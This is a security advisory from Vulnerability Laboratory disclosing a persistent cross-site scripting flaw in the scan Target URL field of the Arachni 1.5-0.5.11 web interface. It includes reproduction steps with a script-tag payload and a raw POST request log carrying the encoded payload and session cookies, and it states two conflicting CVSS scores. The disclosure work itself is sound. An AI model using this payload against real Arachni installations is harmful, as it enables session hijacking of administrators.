Arachni 1.5-0.5.11 Cross Site Scripting

Arachni version 1.5-0.5.11 suffers from a cross site scripting vulnerability.


MD5 | d88388d5b185456c9b8e90a58412ddd7

Document Title:
===============
Arachni v1.5-0.5.11 - Persistent Cross Site Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2046


Release Date:
=============
2017-03-29


Vulnerability Laboratory ID (VL-ID):
====================================
2046


Common Vulnerability Scoring System:
====================================
2.2


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Product & Service Introduction:
===============================
Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators
evaluate the security of modern web applications. It is multi-platform, supporting all major operating systems (MS Windows, Mac
OS X and Linux) and distributed via portable packages which allow for instant deployment.

(Copy of the Homepage: http://www.arachni-scanner.com/ )


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a persistent cross site scripting vulnerability in the official Arachni v1.5-0.5.11 security scanner framework.


Vulnerability Disclosure Timeline:
==================================
2017-03-29: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Tasos Laskos
Product: Arachni - Security scanner framework. 1.5-0.5.11


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Low


Technical Details & Description:
================================
A persistent cross site scripting vulnerability has been discovered in the official Arachni v1.5-0.5.11 security scanner framework.
The vulnerability allows remote attackers to inject own malicious script codes on the application-side of the vulnerable service.

The Target URL field which is available when configuring a scan is vulnerable to cross site scripting. As scans can be shared and
viewed by other users including the admin account, it is possible to execute the cross site scripting under another users context.
The request method to inject is POST and the attack vector is located on the application-side of the service application. The remote
attacker requires a low privilege user account to inject the malicious code that executes finally in the scan on admin preview.

The security risk of the cross site web vulnerability is estimated as low with a common vulnerability scoring system count of 2.2.
Exploitation of the persistent cross site web vulnerability requires a low privilege user account and only low user interaction.
Successful exploitation of the vulnerability results in persistent phishing attacks, persistent external redirect
to malicious sources and persistent manipulation of affected or connected web module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Scans


Proof of Concept (PoC):
=======================
The cross site scripting vulnerability can be exploited by remote attackers with low privilege web-application user account with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Click to Scans
2. Click to New
3. Add the target url field type like ...
Note: http://192.168.184.133/"><script>alert('XSS')</script>
4. Start the scan and a popup appears after a few seconds
5. Now login as admin and preview the already resolved scans
6. Successful reproduce of the cross site scripting vulnerability!


--- PoC Session Logs [POST] ---
POST /scans HTTP/1.1
Host: 192.168.184.133:9292
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Referer: http://192.168.184.133:9292/scans
Cookie: _arachni_webui_session=cDlsNzh4YnAvdFZ5SkpJNzl6eGNHa24xTjJDQ08yS2U2Q25HaG1TbVpTaXZWeTg4ZytvTWIwZGU4bzMzWHVySG1wekRBaFlvRVo
rQi84dDFqbDhZODFTL2hUVW9IWmdoR2l0UEVMSUREamdRQTZzbWJRNlp6TnBIZ1JEOUwwYk9qRThqNWxtRXlndDNyN1F5Kyt4bGVCTlhVQVhqZUxvWlQydDdTS2
VtMzdLS2FwRTIxTkpEYkx6VGh1czI4NGpPNHZjaDVqZlFXQ3VWWWxPOWNuM0VYSWF6eWtGbGlrRDUxR2pOOE9kSmcwOG5iSDE2dTd6UUlSNHl3WXJ6NjNwck05bz
g1Z1VteHpHSERiWThPU0UyQXg0VCtwR2lyaFMrcXdMUHZOTlVhWEtQOGs0L1FLMHRBWHhLRnNvekU3MEwtLW52T0k5TWFwVHdua2xBc2o2Q01DelE9PQ%3D%3D--d
6254a3d409cb051077124a9f4c392b6ab76550a; remember_user_token=BAhbCFsGaQdJIiIkMmEkMTAkbmxKNzdNMTFheHFFMUd1N0dSaUlUdQY6BkVUSSIXM
TQ5MDcxNjk1Ny4xNDQ4OTkxBjsARg%3D%3D--7b8d6c2fb62b59902411c9b41b87491a87882242
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 706
-
utf8=%E2%9C%93&authenticity_token=hGFcuk3YkAPaX4QlhDeGlUlDHVxsT%2FXqppidyhKMBlalWC%2FJctjFy26%2FieU8CeLGeOKzXGF9t5frLVcDhALJnQ%3D%3D
&scan%5Burl%5D=http%3A%2F%2F192.168.184.200%2F%22%3E%3Cscript%3Ealert%28%27XSS+vulnerability%27%29%3C%2Fscript%3E&scan%5Bprofile_id%5D=1&
scan%5Bdescription%5D=&scan%5Buser_ids%5D%5B%5D=&scan%5Buser_ids%5D%5B%5D=1&scan%5Btype%5D=direct&scan%5Binstance_count%5D=1&
scan%5Bschedule%5D%5Bstart_at%5D=&scan%5Bschedule%5D%5Bstop_after%5D=&scan%5Bschedule%5D%5Bstop_suspend%5D=0&scan%5Bschedule%5D%5B
every_minute%5D=&scan%5Bschedule%5D%5Bevery_hour%5D=&scan%5Bschedule%5D%5Bevery_day%5D=&scan%5Bschedule%5D%5Bevery_month%5D=
&scan%5Bschedule%5D%5Bbasetime%5D=finished_at&commit=Go%21


Security Risk:
==============
The security risk of the stored cross site scripting vulnerability in the application is estimated as low. (CVSS 3.7)


Credits & Authors:
==================
Peter Kok - [http://www.vulnerability-lab.com/show.php?user=Peter%20Kok]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails,
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.

Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.

Copyright A(c) 2017 | Vulnerability Laboratory - [Evolution Security GmbH]aC/



--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


Related Posts